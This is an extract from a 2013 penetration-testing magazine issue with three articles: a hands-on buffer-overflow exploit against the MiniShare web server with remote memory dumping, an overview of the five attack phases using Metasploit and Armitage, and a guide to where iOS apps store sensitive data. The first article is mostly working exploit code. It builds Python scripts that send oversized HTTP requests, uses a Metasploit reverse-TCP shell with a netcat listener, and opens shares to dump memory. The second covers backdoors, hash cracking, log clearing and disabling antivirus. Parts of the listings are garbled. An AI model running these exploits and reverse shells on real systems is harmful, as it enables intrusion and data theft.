• Make this script executable: chmod +x pentest and run it ./ • You have successfully crashed your distant MiniShare server. To confirm it; have a look on your OllyDBG. The EIP point should be overwritten to 41414141 (see Figure 56). The instruction pointer (EIP) register contains the address of the next instruction to be executed. So, we successfully make the next address to be executed at 41414141 by sending an HTTP get with 2200 * 41. However, we still don’t know which of the '41' are in the EIP. We do have to generate a pattern to identify how much data we have to send. • In your BackTrack system. Place yourself at /pentest/exploits/framework/tools and run
Listing 2. Python script
#!/usr/bin/python import socket MyTarget ="" Port=80 MyBuffer = "GET " + "\x41" * 2220 + " HTTP/1.1\r\n\r\n" sock=socket.socket(socket.AF_INET, socket. SOCK_STREAM) connect=sock.connect((MyTarget, MyBuffer)) sock.send(MyBuffer) sock.close()

The 'only' thing we have to do is to send enough content in this get in order to accede to the targeted and vulnerable address. • In your BackTrack system; creates a new python script named containing the lines presented in Listing 2.

Listing 3. /pattern_create.rb 2220 Python script
#!/usr/bin/python import socket MyTarget ="" Port=80 MyBuffer = "GET " MyBuffer+= ('Result OF ./pattern_create.rb 2220') MyBuffer+= " HTTP/1.1\r\n\r\n" sock=socket.socket(socket.AF_INET, socket. SOCK_STREAM) connect=sock.connect((MyTarget, MyBuffer)) sock.send(MyBuffer) sock.close()

Figure 56. EIP overwritten to 41414141
OPEN 06/2013 Page 35

the following command: ./pattern _ create.rb 2220 and copy past the output in your python script (see Listing 3). • Restart the program on the victim system (CTRL+F2; F9) and run your python script again. The result of this operation is a new crash of MiniShare but with more information. Indeed, the crash occurs at another address and the ESP value is now Ch7Ch8… (see Figure 57). • Using the pattern offset tool, we can retrieve how much character there is between the violation address and our Ch7Ch8… sequence. Use the command: • Restart MiniShare on the victim system (CTRL+F2;F9) and launch your python script. If everything went well, we do now have the EIP value at CCCCCC (see Figure 58).

Exploiting the buffer overflow flaw

We now own all information that are required to exploiting a buffer overflow. • A vulnerable address: 7CA58265; • The amounts of data to send in the HTTP GET to overwrite the EIP. The next step is to generate an executable code to inject in the victim system (instead of CCCCCCC) • Using the msfpayload tool we can generate a code to gain remote console access to the target: msfpayload Windows/shell _ reverse _ tcp • Modify your python like shown in Listing 5. • Start listening on the 443 Port by executing: sudo nc –nvvlp 443. Then restart for the last time MiniShare and run your script (see Figure 59). How to protect against a Buffer Overflow attack? The first step to immune your system from being overflowed is to patch the software you are using
Listing 4. Python script modified
#!/usr/bin/python import socket MyTarget ="" Port=80 MyBuffer = "GET " MyBuffer += "\x41\x41\x41\x41" # The EIP new value MyBuffer += "\x90" * (1791 - len(buffer)) MyBuffer += "\xcc" * (2220 - len(buffer)) # ESP new value MyBuffer+= " HTTP/1.1\r\n\r\n" sock=socket.socket(socket.AF_INET, socket. SOCK_STREAM) connect=sock.connect((MyTarget, MyBuffer)) sock.send(MyBuffer) sock.close() LHOST= LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c;

./pattern_offset.rb 36684335 (result is 1787) ./ pattern_offset.rb Ch7Ch8 (result is 1791)

• Using these new information; we can modify our python script as shown in Listing 4.

Figure 57. ESP overwritten to Ch7Ch...

Figure 58. Confirm the buffer overflow
OPEN 06/2013 Page 36

to the latest version. Moreover, you should regularly check if there are new entries concerning the software you use in exploit-DB like websites. If you are suspecting such attacks are being conducted in your network; use a network analysis tool such as WireShark to confirm the appearance of suspicious packet and identify the source.

Indeed, we will use the remote control provided by this attack as a sound of basis for the following. The target system is a Windows XP SP2 with: • Monsools Windows Memory Toolkit (http://mathieu-nayrolles/pentestmag/victim/ Monsools Windows Memory Toolkit designed to extract various memory dumps, such as VMWare memory snapshot, Microsoft cash dump, and even the current memory of a target machine. • IP: The attacker system is BackTrack 5r3 with: • Foremost (sudo apt-get install foremost) Foremost is a console program to recover files based on their headers, footers, and internal data structure. Foremost was originally used by the Air Force Office of Special Investigations before being opened to the public. • IP:

Dump memory

During this latest section, we will learn how to dump the memory of a distant machine and analyze it. This very simple process will be able to reconstruct a file that was holding by the distant memory; such as images, audio or private .ssh keys. What you will learn: • To dump the memory of a remote machine; • To analyze the memory dump to retrieve information.


To follow this step-by-step tutorial, you will have to successfully complete the Buffer Overflow attack.
Listing 5. Final form of Python script
#!/usr/bin/python import socket MyTarget ="" Port=80 MyBuffer = "GET " MyBuffer += \x65\x82\xA5\x7C" # The address (REVERSE WAY) MyBuffer += "\x90" * (1791 - len(buffer)) MyBuffer += ('MY PAYLOAD COMMAND RESULT') MyBuffer+= " HTTP/1.1\r\n\r\n" sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=sock.connect((MyTarget, MyBuffer)) sock.send(MyBuffer) sock.close()

Install Moonsools on the remote host
• Re-run your python script from the previous chapter to have a distant access to the victim system (see Figure 60). • In this operation, we will create a shared folder in order to copy the executable, dump the memory into it and download the results file. Of course, this method to install Monsools (the dump memory software) and download the results is not optimum. Indeed, the creation of a shared folder will certainly not pass unobserved and you need an access to the local network. Enter the following commands: • mkdir pentestMag (creates a folder); • net share pentest=c:\PenTestMag /unlimited (creates a shared folder named 'pentest'); • cacls c:\ pentestMag /t /e /g Everyone:f (gives full control over this folder to everyone). You can now access the remote shared folder using the network browsing of BackTrack and copy

Figure 59. Remote Prompt access
OPEN 06/2013

Figure 60. Remote Prompt access
Page 37

the unzipped MonSools into it. You can now run Monsool to dump the memory.
win32dd –d /f C:\pentestMag\dump.dmp

The resulting file will be the size of the physical memory. Pay attention to the free space in the remote hard drive. • Run Foremost (sudo apt-get install foremost) on the dmp file. • Foremost –t all Dump.dmp • Browse the results in the newly created output folder (see Figure 61). By browsing this folder content, you can retrieve any files that were present in the remote system memory.

produce attacks while testing your infrastructure resistance. This work do not claim to be the stateof-the art in penetration and testing using BackTrack, but provides a sound basis for anyone who wants to make this leap towards a more secure environment. The authors would like to give you their heartfelt thanks for reading this article and hope there is fewer flaws to exploit out there.

How to protect against a dump memory operation?

To protect yourself from memory dump; you basically have to protect against remote access like described in previous parts.


With ‘Pentesting with BackTrack’, you are all set to complete a various non-trivial and complex tasks to optimize and protect your infrastructure. Indeed, during this short journey, you have been led in the pentesting world through the step-by-step tutorials and hands-on recipes. We have provided examples of attacks and ways to protect from them on all current hot topics such as: WIFI, Bluetooth, CMS, Windows XP, Windows 7, Trojan, Buffer overflow, and memory forensics. Moreover, from now, you’ve learned the tools that can help you re-

Mathieu was born in France, and it is where he started his studies in Computing Sciences at Exia.Cesi and passed the Diploma in Information Systems Management. He travelled to Europe and completed various internships for companies worldwide, such as Eurocopter and SaintGobain. During the fourth year, he decided to pursue a double diploma course at UQAM, Québec, Canada. In the framework of his study at UQAM, he was awarded for one of his publications, ('Specification and Detection of SOA Antipatterns') on the 10th International Conference on Service-Oriented Computing. He is still completing his last year in both schools, and has written two Master's theses in the Artificial Intelligence and Quality fields. Currently, he is giving courses on agile development, service-oriented architectures, business intelligence, and data mining at the bachelor level in UQAM and eXia.Cesi, along with his own studies. You can find out more about him on his website,

MatHieU NaYrolles

Mathieu is currently working toward the MS degree from the University of Quebec at Montreal. His current research interests include data security in cloud computing, privacy preserving, and network security. He also has a Master's in networking and system administration. He likes spending hours on /r/lolcats and having some fun time drinking beers with friends. You can find out more about him on his website,

MatHieU ScHmitt

Figure 61. Output Folder
OPEN 06/2013

Benoît was born in France, where he graduated at Exia with an emphasis on Networking and System Administration in Nancy. He now lives in Montreal, Quebec, where he's following courses to obtain a Master's degree from the University of Quebec in Montreal. His working fields are multi factor security authentication like fingerprints and facial recognition and at the same time he is giving courses on security for embedded devices in his spare time. He likes IT security in general, web development, particularly UX-wise, project management, his Nexus 4 phone, and preparing great meals. You can follow him on Google+
Page 38

BenoÎt Delorme

Application Security for JavaEE that just works!

Start nding and xing vulnerabilities for free NOW!


Multiphase Penetration Testing
Using BackTrack Linux, Metasploit, and Armitage

Article comes from Pen Test Extra. Download the complete issue.

The EC Council identifies five stages of attack that are common to cyber penetration. [1] These stages of attack may be used to categorize incidences where a network or host has been compromised. Considering that these stages are common to real attacks, they are used by ethical hackers to conduct penetration testing. An ethical hacker, or white-hat hacker, may use these steps in order or may selectively choose the steps that work best for their particular vulnerability. [2]
hen a penetration tester begins to examine a target they often enter the first phase of attack the reconnaissance phase. In this first phase of attack, the attacker or tester tries to discover as much information about the victim as possible. In some cases this phase may involve choosing a target if ther e is no specific target given. (Penetration testers are often given a target, whereas attackers must decide on one.) [5] This phase may involve using search engines or other internet based utilities to learn about the target. [1] After a target has been chosen the tester must attempt to enumerate the target as much as possible. This enumeration is referred to by the EC Council as the scanning phase. [1] While enumeration does occur to some extent in the reconnaissance phase it is in the scanning phase that enumeration occurs the most. The tester will try and uncover detailed information about services by viewing banners presented when ports are presented with requests. [4] This phase also may involve scanning a large target to identify a smaller subset of vulnerable nodes. [8] After the tester has enumerated targets in the scanning phase they begin to plan and preform the third phase, the gaining access phase. [1] In the gaining access phase the tester will plan a stratOPEN 06/2013


egy to attack targets and compromise confidentiality and integrity. The tester will need to confirm the level of overtness they are comfortable with; based on this level of comfort the tester will begin to attack the vulnerable nodes and services. This phase is considered complete when the tester has a foothold in the target. [1] The tester may choose to segment this phase into a second part where the tester spreads and expands the foothold; alternatively the tester could complete all phases and begin again in order to expand the foothold. After establishing an initial foothold in the victim, the tester must aim to maintain that access for a long term compromise. In a real world compromise the attacker is aiming to dig in and capture data that crosses through the victim, maintaining access is the phase where the tester solidifies their grip on the target. [12] In this phase the tester brings tools into the victim and sets up backdoor services that the tester can use to bypass authentication mechanisms. The tester’s primary goal in this phase is to make it easier to access the victim, and also to make access seem more legitimate by adding valid credentials and impersonating legitimate usage. [4] In the final fifth phase the tester works to cover up the evidence that a vulnerability has been exploited and an attacker gained access. [1] There are

Page 40

several motivations for ensuring that this phase is accomplished correctly. In a real attack scenario the attacker will wish to destroy evidence to avoid being detected, and if detected to avoid prosecution. [4] The tester will delete logs and try to manipulate detection methods to not report the compromise. The EC Council refers to the final phase of the multiphase attack as the covering tracks phase. [1]

Reconnaissance Phase

Metasploit, Armitage, and BackTrack

Metasploit was designed as a framework that penetration testers could use to load exploits into and conduct tests against vulnerabilities. [9] The Metasploit framework is coded and hosted by the security organization Rapid7 and is currently on version 4.6. [9] The framework is continually updated with new and modified modules that may be executed to find and test vulnerabilities. The framework is made up of almost a dozen command line utilities that may be used in conjunction. Considering that the framework is command line based and requires quite a substantial learning curve Strategic Cyber LLC designed the Armitage graphical user interface (GUI). [3] Armitage is a frontend for the Metasploit framework and can be used to organize and execute a multiphase penetration test. Many security professionals new to the field of penetration testing prefer to learn the Metasploit framework through the Armitage GUI. [5] While there are some functions of the Metasploit framework that may require you to delve into the command line, many of the phases of attack can be accomplished through Armitage. Many veterans of the security penetration testing field have acknowledged that penetration testers should utilize GUIs like Armitage because it is more similar to the utilities used by actual attackers. [4] Both Metasploit and Armitage have come as standard installs in the BackTrack distribution of Linux since version 5. BackTrack Linux is widely considered the operating system of choice for penetration testers. [5] The operating system includes a plethora of utilities to aid in preforming penetration tests. An experienced user is often able to use the distribution to conduct a full multiphase penetration test without having to access the internet to download additional tools or documentation. BackTrack is currently on Version 5 revision number 3, although this may be the last revision to use the name BackTrack as developers intend to have the next version be referred to as Kali Linux.
OPEN 06/2013

Considering that many penetration testers know their target prior to beginning a test, the reconnaissance phase is largely limited to sniffing the network. BackTrack includes several options for sniffing traffic as shown in Figure 1. Wireshark is an industry favorite because of the sophistication of the GUI. A tester can leverage Wireshark or a comparable network monitor to capture traffic passively as it passes through from node to node. [8] A packet capture is a treasure trove of information for a skilled penetration tester. The tester can scan and filter a packet capture to look for vulnerable services and even begin to capture usernames, hostnames, and in some cases passwords (Figure 1). Wireshark and other sniffer programs work by placing the network interface card (NIC) into promiscuous mode. In normal operation the NIC accepts traffic addressed to the address it has and discards everything else, in promiscuous mode the NIC accepts all traffic. A tester using Wireshark can design specific filters to look for important information in the packet capture; the tester may also choose to run the packet capture through a set of Snort rules to look for vulnerabilities. Snort is an open source intrusion detection system where an administrator can write rules to look for traffic patterns. [11] Snort is a more robust solution for traffic pattern matching than Wireshark and thus the two may be used in conjunction to perform the reconnaissance phase of an attack. [11] At this point in the multiphase attack, the tester should have an idea of vulnerable services or nodes and ideally some credentials. The tester should not skip this phase; however, they should also not spend too much time in this phase as other phases are more likely to yield greater benefits.

Scanning Phase

In the scanning phase Metasploit and Armitage begin to become more prolific in the penetration test-

Figure 1. BackTrack Sniffing Tools

Page 41

ing process. Nmap and many other enumeration modules are provided in the Metasploit framework and Armitage can assist in organizing information garnered in this phase. Nmap is a utility that has been used by networking professionals for many years and is preferred because of its simplicity and robust options. [4] Figure 2 shows the enumeration modules available in the Metasploit framework. Many testers wish to scan the network using a light ping sweep or in a less secure network a service scan. Nmap can provide both of these options as well as options for avoiding intrusion detection and prevention systems. Nmap is an extraordinary utility for enumerating the internet protocol stack, Metasploit and particularly Armitage are able to store and utilize the outputs from Nmap. After enumerating the addressing schemes and services the tester is better able to target particular parts of the network, and the tester may begin to map the target network. A good penetration tester should feel comfortable with making use of all the tools available to them. Figure 3 shows the BackTrack utilities for scanning and enumeration that may be used by a penetration tester. Nessus is a vulnerability scanner used by the United States Department of Defense and trusted by many penetration testers. [4] Nessus results and other standard scanning formats may also be imported into Armitage to identify hosts, services, and vulnerabilities. The tester should have a solid plan at this point with prime targets in mind and a list of attacks to perform in the third phase of attack.

Gaining Access

The third phase of the multiphase attack is where testers or attackers cross a line and gain access to nodes in an unauthorized manner. The tester must balance conducting a successful penetration test and maintaining the integrity of a client’s network. Clients have to weigh the benefit of a real world penetration test with the potential harm it could do to their production network. A talented penetration tester should understand the limits of their tools, and at what point they become a threat to the availability of the production network. The third phase also represents a choice for the penetration tester. The multiphase attack methodology can be used as a one pass method where the tester only goes through the phases once or it can be conducted multiple times throughout the areas of the network. If the tester chooses to only work through the phases once, the third phase of gaining access should be divided into two subsections. In the first subsection the tester will try and gain access and in the second subsection the tester will spread to all the targets identified in the scanning phase. Deciding between working the phases once and going through them multiple times can depend on the target network itself or the tester’s personal preferences. A larger network that is easily devisable into smaller sections may be

Figure 2. Armitage Enumeration Modules
OPEN 06/2013

Figure 3. BackTrack Scanning and Enumeration Tools
Page 42

more effectively tested by using the multiphase approach more than once. In either case the tester must consider using a compromised host as a Launchpad for further exploit. [6] This consideration must be carefully evaluated by a tester because it may skew results. A vulnerability may only be exploitable if another host has already been compromised. [6] The tester should always denote Launchpad tests in a final report and make sure the client understands the methodology behind the tests. The tester must always consider that an attacker will utilize any method available to them and certainly leverage a Launchpad scenario to gain access. In this phase the tester will begin running exploits against the vulnerabilities identified in the scanning phase. Metasploit includes modules that can perform a wide array of attacks; in order to fully gain access the tester should be able to prove access to the confidentiality of a system or a set of data. [10] The tester can choose from an array of attacks, a brute force may be appropriate for a telnet service where as a directory traversal attack may be best on an FTP or HTTP web server. Choosing the proper exploits to use in order to gain access is an essential part of penetration testing. If the tester runs too wide a variety of exploits they increase the risk of being detected and prevented. The tester must rely heavily on information from the first two phases in order to choose the exploits with the highest chance of success. Deciding on a proper payload is another key factor in the gaining access phase. The tester may only get one payload to the target, and deciding if that payload should simply alert on a success or attempt to fully compromise the host is important. Going with too strong of a payload that does too much may guarantee detection by a host-based defense mechanism; conversely some exploits by their very nature only work once before crashing a service so a conservative payload may cost the tester a successful access. Metasploit has a custom shell environment called Meterpreter that may be packaged as a payload, many testers choose this payload because it has a small footprint, is very versatile, and is loaded with penetration testing functionality. [7]

Meterpreter shell environment becomes much more important. Meterpreter has options and settings that can be manipulated directly from the Armitage GUI. Armitage can use Meterpreter to import additional tools to the victim and set up backdoors. Netcat is a backdoor utility that can easily be imported and set up using Meterpreter. There are many other utilities that can also be imported to create a backdoor. [4] Rather than choosing to set up a malicious backdoor service experienced penetration testers often try to emulate legitimate traffic as much as possible, one way to effectively masquerade as an authorized user is to obtain valid credentials. Valid credentials are arguably some of the most important information a penetration testers or attacker can uncover. Meterpreter and Armitage have some options for obtaining sets of valid credentials. Meterpreter is best designed to exploit hosts running Windows operating systems, while Meterpreter can run on Linux and UNIX based hosts, it is more limited than on a Windows host. [7] Meterpreter is able to export Windows LM Hashes directly into password cracking utilities, the shell can also export Linux shadow files but it may require more interaction from the penetration tester. For Windows targets Armitage can accept LM Hashes from Meterpreter and begin to directly crack them in John the Ripper a popular password cracking utility. Figure 4 shows Armitage cracking passwords from Meterpreter using John the Ripper. The unified interface allows for penetration testing optimization and organization of important information. A penetration tester must consider that the specific vulnerability they used to compromise the target may eventually be patched and the objective of the maintaining access phase is to have other options for access.

Maintaining Access

Once the tester has gained the initial foothold in the target network the maintaining access phase begins where the tester tries to solidify their grip on the target. In the maintaining access phase the
OPEN 06/2013

Figure 4. Armitage Password Cracking

Page 43

Covering Tracks
In the final phase of penetration testing, the tester should attempt to cover up the evidence of the compromise ever occurring. A penetration tester must take extra consideration during this phase; the tester does not want to remove information that could be valuable in explaining and reporting the test to the client. A real world attacker would not be so kind as to refrain from covering their tracks but the penetration tester may need that information as a teaching tool. One method that penetration testers may find valuable is to back up logs and other information prior to deleting them, this way the client’s IT staff may be evaluated on their forensic abilities, and log information is still available to show testing results. Meterpreter includes a particularly useful script for clearing Windows logs. The script (log.clear) can be executed from a Meterpreter shell environment. [7] By default the script only clears the system event log; however, the script can be configured to clear all logs. The covering tracks phase may seem straightforward, but it can be deceptively difficult to accomplish. One way to make the covering tracks phase easier to accomplish is to work the phases while considering them all in as new assets become available. considering the phases as a whole will yield benefits, an experienced penetration tester is able to make decisions during the test that will positively impact the later actions in the test. [5] Taking for example the covering tracks phase, this phase may be accomplished more effectively if logging does not occur. In the third phase, gaining access, the penetration tester can utilize scripts built into Metasploit to disable Anti-Virus and Firewalls on compromised hosts. Some actions come with experience, but a skillful penetration tester can take some steps to perform a better test. At the beginning and end of each phase the penetration tester should consider what new options are now available and if these options open any new opportunities. The tester should evaluate the phases that come before and after the current phase; any new options that could improve the other phases should be evaluated and pursued.


Working the Phases Holistically

The phases are designed in a chronological order, but they do not have to always be carried out in that direct order. There are many cases where

A penetration tester is well served by putting a methodology to their testing strategy. Much like networking professionals utilize the OSI model to organize and troubleshoot networking issues, the penetration tester can utilize the EC Council five phase attack plan to organize the penetration test. [1,8] The five phases must be considered chronologically as they were designed, but the phases may best be utilized if evaluated holistically. Working through each phase carefully

[1] EC Council. (2010). Ethical Hacking and Countermeasures: Attack Phases. Clifton Park: Cengage Learning. [2] EC-Council. (2012). C|EH Candidate Handbook v1.6. EC-Council. [3] Fast and Easy Hacking. (2013). Armitage. Retrieved from Fast and Easy Hacking: http://www.fastandeasyhacking. com/ [4] Harris, S. (2012). All-In-One CISSP Exam Guide. New York: McGraw Hill. [5] Harris, S., Harper, A., & Ness, J. (2011). Gray Hat Hacking the Ethical Hackers Handbook. New York: McGraw Hill. [6] Masood, R., Um-e-Ghazia, U., & Anwar, Z. (2011). SWAM: Stuxnet Worm Analysis in Metasploit. Frontiers of Information Technology, 142-147. [7] Offensive Security. (2012). Existing Scripts. Retrieved from Metasploit Unleashed: http://www.offensive-security. com/metasploit-unleashed/Existing_Scripts [8] Paquet, C. (2009). Implementing Cisco IOS Network Security: Authorized Self-Study Guide. Indianapolis: Cisco Press. [9] Rapid 7. (2013). Penetration Testing Solutions – Metasploit. Retrieved from Rapid7: [10] Refai, M. (2006). Exploiting a buffer overflow using metasploit framework. Proceedings of the 2006 International Conference on Privacy, Security and Trust: Bridge the Gap Between PST Technologies and Business Services (pp. 1-4). New York: ACM. [11] Roesch, M., & Green, C. (2003-2012). Snort Users Manual 2.9.3. Retrieved October 19, 2012, from Snort: manual. [12] Siles, R. (2010). Assessing and Exploiting Web Applications with the Open-Source Samurai Web Testing Framework. Taddong: Springer Berlin Heidelberg.

Works Cited

OPEN 06/2013

Page 44

while continually looking at the testing plan as a whole, is the most effective way to leverage the five phase model. A penetration tester’s tool kit should be an extension of the tester themselves. Knowing what utilities are available to the tester and using those tools to their full potential is essential. BackTrack Linux is a distribution designed specifically for penetration testers, the tools contained in BackTrack are designed to accomplish a full multiphase penetration test. [5] Metasploit and the accompanying Armitage GUI are two key tools in a skilled penetration tester’s tool kit. [3,9] The robustness of Metasploit and the organization capabilities of Armitage make these tools stand out among alternatives. Tools will change, but a strong methodology will stay current through changes in technology. A good penetration tester works to understand the resources available to them and how these resources can be applied effectively in each phase. Carefully planning a penetration test can occur prior to ever receiving a job, while the target does change applicable tools a good penetration tester can prepare for many different scenarios. Practicing using lab environments and virtual technologies will assist a tester in compiling a strong tool kit. The best penetration tester prepares, and is interested in continually improving their craft through practice.

A North Carolina native received a Bachelor of Science degree in Information Technology from East Carolina University. Graduating Suma Cum Laude Lance completed his undergraduate degree in 2012. As an undergraduate student Lance concentrated in Cisco networking technology. Lance is currently pursuing a Master of Science in Information Security at East Carolina University. Lance holds several major industry certifications including the Associate of ISC2 towards a CISSP, CCNP, CompTIA Security+, EMCISA, and MCP.
OPEN 06/2013

Lance ClegHorn


Mobile Applications: The True Potential Risks Where to look for information when performing a
Pentest on a Mobile Application
Since the introduction of the iPhone, Apple has sold more than 315 million iOS devices over the past few years and 750 million Android devices have been activated to date.

Article comes from PenTest WebApp TO BE RELEASED

he smartphone platform has created a new business and companies want to make their services available on mobile devices in order to reach out to users very quickly and easily. Both iOS and Android devices have enough power and performance to perform most of the tasks one can do on a laptop, and their applications span a range of categories including banking, healthcare, and trading. With an increasing stronghold in the market, a plethora of companies are developing new applications to work with these new mobile platforms. These applications often deal with Personally Identifiable Information (PII), credit card, financial and other sensitive data. With this trend it is important for security professionals to understand the nuances of penetration testing mobile devices. To achieve this, one must comprehend how these applications are developed and where developers may store critical data. With that in mind, this paper focuses on helping pentesters understand where critical data may be stored. Note that the mechanics of performing the actual penetration test itself will be addressed in a future article.
OPEN 06/2013


This article mainly covers what security professionals should be looking for when performing a penetration test of a mobile application. The main discussion concentrates on data found for iOS applications, but similar data concerns exist on the Android and Windows 7-based phones, but for the purpose of this article those will not be discussed at this time.


Web applications are no longer limited to the traditional HTML-based interface. Web services and mobile applications have become more common and are regularly being used to attack clients and organizations. As such, it has become very important that pentesters understand how to evaluate the security of these systems. The iPhone provides developers with a platform to develop two types of applications: • Web based applications – where JavaScript, CSS, and HTML-5 technologies run inside Safari/Webkit, • Native iOS applications – which are developed using Objective-C and compiled for operation and execution on the device itself.

Page 46

To adequately test mobile applications, professionals need to learn not only how to build a test environment for mobile applications and web services, but also how to deploy various techniques to discover flaws within the applications and backend systems. Most importantly, pentesters need to know where to look to adequately find critical data that is typically stored in the device. The requirments for this are: • Understanding the mobile platforms and architecture, • Building a test environment, • Intercepting traffic to web services and from mobile applications, • Injecting malicious traffic into web services, • Look for potential sensitive data leaks on the device.. There are two standard approaches to testing a mobile application. One approach is to perform “Whitebox Testing” where pen testers have access to the actual source code of the application and full documentation. This method can be applied in order to simulate what could happen in the event and what a developer with internal access to the application and source code could do if operating in a rogue capacity. The second approach is to perform Blackbox Testing, where pentesters have no source code or related documentation and only have the publicly downloadable application to work with. This method simulates what could happen if an outside hacker with no knowledge of your application performed an attack. The main attack vector is typically to intercept traffic and inject rogue content to see what information you can obtain. This type of testing typically tries to exploit things like Cross site scripting (XSS), Link Injection, and SQL injection flaws. Both approaches are worthwhile and should be performed as part of any complete security test. In our experience, blackbox testing is most often performed by security professionals, but there is much to be gained by incorporating a whitebox test as part of this process, especially in the SDLC development process. A whitebox test will discover things like: • Internal security holes, • Logic flaws, • Broken or poorly structured paths in the coding processes,
OPEN 06/2013

• • • •

The flow of specific inputs through the code, Expected output, The functionality of conditional loops, Testing of each statement, object and function on an individual basis, • Memory Leaks. To help guide the penetration tester, OWASP ( _Testing_Cheat_Sheet) has released a series of methodologies that help in this process (see Mobile_Security _Project for more details). In the following sections, we are going to focus on how iOS applications are vulnerable rather than the iPhone operating system itself. In reality, there is an overlap between the iPhone OS security and the iPhone application security. So understanding the iOS platform and its security technology will help pentesters properly assess the security of iPhone applications. The main areas of focus while assessing the security of iPhone applications are: • • • • • Application traffic analysis, Privacy Issues, Local Data Storage, Caching, Push Notifications.

Application Traffic Analysis

Penetration testing iOS applications is not all that different from client-server applications. Both still interact with the server-side components over a network using similar protocols, so the process also involves network penetration testing and web application penetration testing techniques. The primary goal in traffic analysis is to capture and analyze the network traffic to find vulnerabilities and then try to exploit them. iOS applications may transmit data to the server over any of these communication mechanisms: • Clear text transmission, such as http, • Encrypted channel, such as https, • Custom protocols or Low level streams. In general, mobile applications are more prone to Man-in-the-middle (MITM ) attacks because most people access them over Wi-Fi which is not always secure. An attacker who has access to the same Wi-Fi can run tools and hijack user sessions. As plain text transport protocols are vulner

Page 47

able to MITM attacks, applications which transmit sensitive data must use encrypted communication protocols like https. During penetration testing, observe whether the application is transmitting any sensitive data over the encrypted channel or not. Application traffic can be captured by configuring the proxy settings available on all iOS devices. Upon setting up a proxy, the iOS system will route its traffic through the configured proxy, where pentesters can analyze what is being transmitted and received to determine what is vulnerable, and then develop a plan of attack similar to what pentesters would do for any other web application. Client-side data storage is an area where some development teams assume that users will not have access. To the contrary, many of the most publicized mobile application security incidents have been caused by insecure or unnecessary client-side data storage. Devices’ file systems are no longer a sandboxed environment where you cannot expect a malicious user to be inspecting. Rooting or jail-breaking a device usually circumvents any protections and in some cases, where data is not protected properly, all that is needed to view application data is to hook the device up to a computer and use some specialized tools. A few of the ways that a malicious actor can access this data are listed below:

Data Privacy Issues

Every iPhone has an associated unique device Identifier derived from a set of hardware attributes called a UDID. A UDID is burned into the device and one cannot remove or change it. However, it can be spoofed. Although Apple has recently indicated that they will no longer accept applications in the App Store that access the UDID of a device ( php?id=3212013a), there are many applications that currently exist in the App Store that still do so. While penetration testing, observe the network traffic for UDID transmission. UDID in the network traffic indicates that the application is collecting the device identifier, or might be sending it to a third party analytic company to track the user’s behavior. Apart from UDID, applications may transmit personal identifiable information like age, name, address, and location details to third party analytic companies. Transmitting personal identifiable information to third party companies without the user’s knowledge also violates the user’s privacy. So, during penetration testing carefully observe the network traffic for the transmission of any important data.

From Backups

When an iPhone/iPad is connected to iTunes, iTunes automatically takes a backup of everything on the device. This means that sensitive files will also end up on the workstation. An attacker who gets access to the workstation can read the sensitive information from the stored backup files. Physical access to the device Individuals lose their phones and phones get stolen very easily. In this case, an attacker will get physical access to the device and be able through various methods to read the sensitive information stored on the phone. The passcode set to the device will not protect the information as it is possible to brute force the iPhone simple 4-digit passcode within 20 minutes. Malware Leveraging a security weakness in iOS may allow an attacker to design a malware which can steal the files on the iPhone remotely. In most cases, during a penetration test, local storage issues are easily and often found. You do not need expensive tools to steal find this data. Simply browse a jail-broken device for these file types. If you have source code, simple commands like recursive grep and strings can do wonders in identifying keywords that deal with planting data into files like these (SQL Statements like insert, and others). In some cases, you will need tools to convert or read the file formats. Installing SQLite via the command line is simple enough, other tools like putil will allow for conversion of a binary .plist file, temporary files that typically store sensitive data, to a readable XML one. The point is that anyone can do this if you know what to look for.

Local Data Storage

Mobile applications store the data locally on the device to maintain essential information across the application execution, for a better performance and offline access. Developers use the local device storage to store information such as user preferences and application configurations. As device theft is becoming an increasing concern, especially in the enterprise, insecure local storage is considered to be one of the top risks in mobile application threats. In fact, it has been categorized as the top risk in the OWASP mobile top-10 (
OPEN 06/2013

Page 48

The key to any thorough pentest is to understand the underlying structure of the device and applications stored on it. Knowing where to look is more than half the battle. iOS applications are treated as a bundle represented within a directory. The bundle groups all the application resources, binaries, and other related files into a directory. In iOS, applications are executed within a jailed environment (sandbox) with mobile user privileges. Unlike the Android UID based segregation, iOS applications run as one user. Apple says ‘The sandbox is a set of fine-grained controls limiting an application’s access to files, preferences, network resources, hardware, and so on. Each application has access to the contents of its own sandbox but cannot access other applications’ sandboxes. When an application is first installed on a device, the system creates the application’s home directory, sets up some key subdirectories, and sets up the security privileges for the sandbox (iOS Application Programming Guide).’ A sandbox is a restricted environment that prevents applications from accessing unauthorized resources. However, upon iOS jail-break, all of the sandbox protections are disabled. This exposes all local storage. When an application is installed on the iPhone, it creates a directory with a unique identifier under /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. So it is important that you take the time and understand this structure ( before testing. It’s important to distinguish what data is at risk and where is it insecurely stored: • • • • • • • • • • Usernames, Authentication tokens or passwords, Cookies, Location data, Stored application logs or Debug information, Cached application messages or transaction history, UDID or EMEI, Personal Information (DoB, Address, Social, and so on), Device Name, Network Connection Name, private API calls for high user roles, Credit Card Data or Account Data.

iPhone Application Directory Structure

ceptible to loss and theft compared to regular computers. In addition to this, cached data may get copied to the machines that are used for syncing and could be stolen from there. Research has shown that the iOS does cache sensitive information such as keystrokes and snapshots often for extended periods of time. Moreover, the application itself may be storing sensitive information in the form of temporary files, .plist files, or in the client side SQLite Database. On an iOS device, ap plications may store local information for use in any of the locations listed below. • • • • • • • Plist files, Keychain, Application’s home directory, Cache, SQLite databases, Cookie Stores, Logs.

During testing, it is critical to identify these risks and provide recommendations to mitigate them. This is an area that some pentesters overlook as they concentrate solely on network traffic analysis, which is only a small piece of the puzzle. We will attempt to explain the importance of each of these local storage areas and why they are important to a pentester.

Plist files

Data protection is an important category when testing mobile applications as they are more susOPEN 06/2013

A Property List or “Plist” file is a structured binary formatted file which contains the essential configuration of a bundle executable. It is typically stored in nested key value pairs. Plist files are used to store the user preferences and the configuration information of an application. Plist can either be in XML format or in binary format. As XML files are not the most efficient means of storage, most of the applications use binary formatted .plist files. Binary formatted data stored in the .plist files can be easily viewed or modified using .plist editors, which convert the binary formatted data into an XML formatted data, later it can be edited easily. Plist files can be viewed and modified easily on both the jailbroken and non-jail-broken iPhones. The technical implementation of reading and writing values for developers is fairly straightforward and provides one of the quickest ways to access stored information, so it is used frequently. Developers rarely use third party libraries in order to read from .plists. Plists reside with the application structure on the device, so if the application is deleted

Page 49

